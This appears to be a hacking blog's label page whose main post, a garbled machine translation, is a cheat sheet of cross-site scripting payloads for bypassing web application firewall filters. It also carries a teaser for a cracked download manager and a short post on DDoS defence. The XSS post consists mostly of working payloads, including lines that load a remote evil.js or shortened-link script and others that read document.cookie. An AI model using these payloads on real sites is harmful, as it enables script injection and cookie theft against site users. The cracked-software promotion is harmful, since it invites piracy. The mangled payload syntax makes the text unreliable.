Internet Download Manager (IDM) With Crack and Instructions

Internet Download Manager (IDM) is a tool to increase download speeds by up to 5 times, resume and schedule downloads.

Bypass WAF XSS Filters

This article comes from the "Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters" which bypass xss filter section, in front of...

Anroid SOP bypass 70% users on risk

Rafay Baloch a white from Pakistan discover a serious flaw in anroid defalut browser called SOP (same origin policy) bypass.

Showing posts with label hacking-website. Show all posts
Showing posts with label hacking-website. Show all posts

Oct 9, 2014

Bypass WAF XSS Filters

By , , , 3 comments
This article comes from the "Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters" which bypass xss filter section, in front of a feature according to WAF WAF determine which test method to skip, and a look behind the focus around some basic xss testing process, although it is around the WAF, but here is based on the regular WAF defect to bypass testing methods, not agreement on the issue, so, basically xss filter can be common to other scenarios.Relatively easy to novices quickly learned some of the basic methods of testing xss.
Bypassing Blacklists
Most of the sites are done using blacklists to filter, there are three ways to bypass blacklist tests:
1> A violent test (input large amounts of payload, see return results)
2> according to the regular projections
3> using a browser bug

Preliminary tests

1) try to insert more normal HTML tags, such as: <b>, <i>, <u> look at the situation return to the page is like, whether HTML coding, or the label is filtered.
2) Try to insert tags are not closed, for example: <b, <i, <u, <marquee and then look back a response, whether open label also has filtering.
3) Then test of several XSS payload, basically all the xss filter will be filtered:
<Script> alert (1); </ script>
<Script> prompt (1); </ script>
<Script> confirm (1); </ script>
<Scriptsrc = "http://rhainfosec.com/evil.js">
See returns response is filtered all, or only a portion of the filter, if also left alert, prompt, confirm the characters, then try the case of a combination of:
<ScRiPt> alert (1); </ scrIPt>
4) If the filter is only the <script> and </ script> tag filtered out, then you can use
<Scr <script> ipt> alert (1) </ scr <script> ipt>
The way to get around, so that when the <script> tag is filtered out, leaving just combined to form a full payload.
5) with <a href tag to test to see if the response is returned
<a href="http://www.google.com"> Clickme </a>
<A href tag is being filtered by the filter if href whether data is filtered in
If no data is filtered, insert the javascript protocol to see:
<a href="javascript:alert(1)"> Clickme </a>
Whether to return an error if javascript entire contents of the agreement have been filtered out, or just filter under the javascript character case conversion attempt
Continue to test events trigger the execution of javascript:
<a href="rhainfosec.com" onmouseover=alert(1)> ClickHere </a>
To see whether the onmouseover event is filtered. Testing an invalid event, watching filtering rules:
<a href="http://www.madleets.com" onclimbatree=alert(1)> ClickHere </a>
Is a complete return to it, or just like onmouseover is blown away.
If it is full, then it is returned, it means, do a blacklist of events, but in HTML5, there are more than 150 kinds of ways to execute javascript code to test a rare event event:
<Body / onhashchange = alert (1)> <a href=#> clickit

Test other tag

The next test other tag with attributes

Src attribute

<Img src = x onerror = prompt (1);>
<Img / src = aaa.jpg onerror = prompt (1);> 
<Video src = x onerror = prompt (1);>
<Audio src = x onerror = prompt (1);>

iframe tag

<Iframe src = "javascript: alert (2)">
<Iframe / src = "data: text & sol; html; & Tab; base64 & NewLine;, PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg ==">

embed tag

<Embed / src = // goo.gl/nlX0P>

action attribute

Use <form, <isindex other labels in the action attribute execute javascript

<Form action = "Javascript: alert (1)"> <input type = submit>
<Isindex action = "javascript: alert (1)" type = image>
<Isindex action = j & Tab; a & Tab; vas & Tab; c & Tab; r & Tab; ipt: alert (1) type = image>
<Isindex action = data: text / html, type = image>
<Formaction = 'data: text & sol; html, & lt; script & gt; alert (1) & lt / script & gt'> <button> CLICK

formaction property

<Isindexformaction = "javascript: alert (1)" type = image>
<Input type = "image" formaction = JaVaScript: alert (0)>
<Form> <button formaction = javascript & colon; alert (1)> CLICKME

background properties

<Table background = javascript: alert (1)> </ table> // effective in Opera 10.5 and IE6

poster Properties

<Video poster = javascript: alert (1) //> </ video> // Opera 10.5 or less effective

data attributes

<Object data = "data: text / html; base64, PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4 =">
<Object / data = // goo.gl/nlX0P?
code attribute
<Applet code = "javascript: confirm (document.cookie);"> // Firefox effective
<Embed code = "http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess = always>

Event triggers

<Svg / onload = prompt (1);>
<Marquee / onstart = confirm (2)> /
<Body onload = prompt (1);>
<Select autofocus onfocus = alert (1)>
<Textarea autofocus onfocus = alert (1)>
<Keygen autofocus onfocus = alert (1)>
<Video> <source onerror = "javascript: alert (1)">

The shortest test vectors

<Q / oncut = open ()>
<Q / oncut = alert (1)> // in place to limit the length of a very effective

Nesting

<Marquee <marquee / onstart = confirm (2)> / onstart = confirm (1)>
<Bodylanguage = vbsonload = alert-1 // IE8 effective
<Command onmouseover
= "\ X6A \ x61 \ x76 \ x61 \ x53 \ x43 \ x52 \ x49 \ x50 \ x54 \ x26 \ x63 \ x6F \ x6C \ x6F \ x6E \ x3B \ x63 \ x6F \ x6E \ x6 6 \ x69 \ x72 \ x6D \ x26 \ x6C \ x70 \ x61 \ x72 \ x3B \ x31 \ x26 \ x72 \ x70 \ x61 \ x72 \ x3B "> Save </ command> // IE8 effective

Under the circumstances the filter brackets

When the brackets are filtered when you can use the throw to bypass
<a onmouseover="javascript:window.onerror=alert;throw 1>
<Img src = x onerror = "javascript: window.onerror = alert; throw 1">
These two test vectors in Chrome with IE on top there will be a "uncaught" error, you can use the following vectors:
<Body / onload = javascript: window.onerror = eval; throw '= alert \ x281 \ x29';>

expression attribute

<Img style = "xss: expression (alert (0))"> // IE7 following
<Div style = "color: rgb ('' & # 0; x: expression (alert (1))"> </ div> // IE7 following
<Style> #test {x: expression (alert (/ XSS /))} </ style> // IE7 following

location attribute

<a onmouseover=location='javascript:alert(1)'> click
<Body onfocus = "loaction = 'javascript: alert (1)'"> 123

Some other payload

<Meta http-equiv = "refresh" content = "0; url = // goo.gl/nlX0P">
<Meta http-equiv = "refresh" content = "0; javascript & colon; alert (1)" />
<Svg xmlns = "http://www.w3.org/2000/svg"> <g onload = "javascript: \ u0061lert (1);"> </ g> </ svg>
<Svg xmlns: xlink = "http://www.w3.org/1999/xlink"> <a> <circle r = 100 /> <animate attributeName = "xlink: href" values ​​= "; javascript: alert (1 ) "begin =" 0s "dur =" 0.1s "fill =" freeze "/>
<Svg> <! [CDATA [> <imagexlink: href = "]]> <img / src = xx: xonerror = alert (2) //"> </ svg>
<Meta content = "& NewLine; 1 & NewLine ;; JAVASCRIPT & colon; alert (1)" http-equiv = "refresh" />
<Math> <a xlink:href="//jsfiddle.net/t846h/"> click

When = ();: When is filtered

<Svg> <script> alert & # 40/1 / & # 41 </ script> // pass to kill all browsers
opera can not close
<Svg> <script> alert & # 40 1 & # 41 // Opera to be investigated

Entity encoding

In many cases the entity will be encoded input data WAF users,
javascript is a very flexible language, you can use a lot of coding, such as Hex, Unicode and HTML. However, these codes can also be used in which position provisions:
Attributes:
href =
action =
formaction =
location =
on * =
name =
background =
poster =
src =
code =
Supported encoding: HTML, octal, decimal, hexadecimal and Unicode
Attributes:
data =
Supported encoding: base64

Filtering based on context

WAF biggest problem is that I do not know the context of the output of the position, resulting in specific environments can be bypassed.

Enter in the property

<Input value = "XSStest" type = text>
Controllable position XSStest, you can use
"> <Img src = x onerror = prompt (0);>
If <> is filtered, then you can be replaced
"Autofocus onfocus = alert (1) //
Similarly there are many other payload:
"Onmouseover =" prompt (0) x = "
"Onfocusin = alert (1) autofocusx ="
"Onfocusout = alert (1) autofocus x ="
"Onblur = alert (1) autofocusa ="

Enter the script tag

For example:
<Script>
Var x = "Input";
</ Script>
Controllable position Input, you can close the script tag to insert the code, but also we just closed the double quotes can execute js code
"; Alert (1) //
The end result is
<Script>
Var x = ""; alert (1) //
</ Script>

Unconventional event listener

For example:
"; Document.body.addEventListener (" DOMActivate ", alert (1)) //
"; Document.body.addEventListener (" DOMActivate ", prompt (1)) //
"; Document.body.addEventListener (" DOMActivate ", confirm (1)) //
The following are some of the same categories:
DOMAttrModified
DOMCharacterDataModified
DOMFocusIn
DOMFocusOut
DOMMouseScroll
DOMNodeInserted
DOMNodeInsertedIntoDocument
DOMNodeRemoved
DOMNodeRemovedFromDocument
DOMSubtreeModified

HREF content controllable

For example:
<a href="Userinput"> Click </a>
Controllable is Userinput where we need to do is enter the javascript code like:
javascript: alert (1) //
Finally, the combination of:
<a href="javascript:alert(1)//"> Click </a>

Transform

URL encoded using HTML entities to bypass the blacklist, href where the entity will automatically decode, if all else fails, you can try using vbscript in IE10 below are valid, or use the data protocol.

JavaScript transformation

When using the javascript protocol can use examples:
javascript & # 00058; alert (1)
javaSCRIPT & colon; alert (1)
JaVaScRipT: alert (1)
javas & Tab; cript: \ u0061lert (1);
javascript: \ u0061lert & # x28; 1 ​​& # x29
javascript & # x3A; alert & lpar; document & period; cookie & rpar;

Vbscript transformation

vbscript: alert (1);
vbscript & # 00058; alert (1);
vbscr & Tab; ipt: alert (1) "
Data URl
data: text / html; base64, PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg ==

JSON

When you enter will be displayed in the encodeURIComponent them, it is very easy to insert xss code
encodeURIComponent ('userinput')
userinput at controllable, test code:
-alert (1) -
-prompt (1) -
-confirm (1) -
The end result:
encodeURIComponent ("- alert (1) -")
encodeURIComponent ("- prompt (1) -")

SVG tag

When returning results when the svg tag, there will be a feature
<Svg> <script> varmyvar = "YourInput"; </ script> </ svg>
YourInput controllable input
www.site.com/test.php?var=text";aler
t(1)//
If the "coding some he is still able to perform:
<Svg> <script> varmyvar = "text & quot ;; alert (1) //"; </ script> </ svg>

Browser bug

Charset bug in IE appear many times, the first one is UTF-7, but this is only available in previous versions, you can now discuss the javascript executed in a browser now among.
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS
This page which we controlled the character set of the current page, when our regular tests:
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v="><img src = x onerror = prompt (0);>
Return result can be seen in double quotes were coded:
<Html>
<Meta charset = "utf-8"> </ meta>
<Body>
<Input type = "text" value = "& quot; & gt; & lt; img src = x onerror = prompt (0); & gt;"> </ input>
</ Body>
</ Html>
Set the character set is UTF-32:
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1 )% E3% B0% 80 / script% E3% B8% 80
The above can be performed successfully in IE9 and below.
Use 0 bytes bypass:
<Scri% 00pt> alert (1); </ scri% 00pt>
<Scri \ x00pt> alert (1); </ scri% 00pt>
<S% 00c% 00r% 00% 00ip% 00t> confirm (0); </ s% 00c% 00r% 00% 00ip% 00t>
In the following version IE9 and effective.

Read More

Sep 20, 2014

Post Your Blog Posts To Your Facebook Wall Automatically

By , , , , , , , 9 comments
A wordpress Plugin Allow To cross-post your blog posts to your Facebook Wall. Your Facebook “Boxes” tab will show your most recent blog posts.
Read More

Sep 18, 2014

What are DDoS attack? How To Defend Against Them?

By , , No comments
You may have heard of a DDoS (distributed denial-of-service) attack in the news as a method used by malicious hackers to attack a website. It's possible you've even experienced the effects of a DDoS attack yourself.If you host a website or other online service, being aware of the dangers of a DDoS attack can help you prevent one, or mitigate the damage they can incur.
A New Type Of Warfare

A WikiLeaks story from 2010 has redefined DDoS attacks as a legitimate form of protest. Computing expert Richard Stallman has gone on record saying DDoS attacks are "the Internet equivalent of a mass demonstration." Stallman defines such "demonstrations" as being separate from hacking or cracking, and compares them with harmless demonstrations that temporarily closed down several British stores recently, in order to highlight corporate tax evasion.

Distributed Denial of Service Attacks

Sometimes a cracker uses a networkof zombie computers to sabotage a specific Web site or server. The idea is pretty simple -- a cracker tells all the computers on his botnet to contact a specific server or Web site repeatedly. The sudden increase in traffic can cause the site to load very slowly for legitimate users. Sometimes the traffic is enough to shut the site down completely. We call this kind of an attack a Distributed Denial of Service(DDoS) attack.

Ways To Defend Against DDoS Attack

  1. Develop a checklist for standard operating procedures to follow in the event of an attack, including maintaining a checklist of contact information for internal firewall teams, intrusion detection teams and network teams, as well as for service providers. Identify who should be contacted during an attack, what processes should be followed by each and what information is needed.
  2. ISPs and hosting providers might provide mitigation services. Be aware of the service-level agreement provisions.
  3. Identify and prioritize critical services that should be maintained during an attack so IT staff will know what resources can be turned off or blocked as needed to limit the effects of the attack.
  4. Ensure that critical systems have sufficient capacity to withstand an attack.
  5. Keep network diagrams, IT infrastructure details and asset inventories current and available to help understand the environment. Have a baseline of the daily volume, type, and performance of network traffic to help identify the type, target and vector of attack. Identify existing bottlenecks and remediation actions needed.
  6. Harden the configuration settings of the network, operating systems and applications by disabling unnecessary services and applications.
  7. Implement a bogon (bogus IP address) block list at the network boundary to drop bogus IP traffic.
  8. Employ service screening on edge routers where possible to decrease the load on stateful security devices such as firewalls.
  9. Separate or compartmentalize critical services, including public and private services; intranet, extranet, and Internet services; and create single-purpose servers for services such as HTTP, FTP, and DNS.
Read More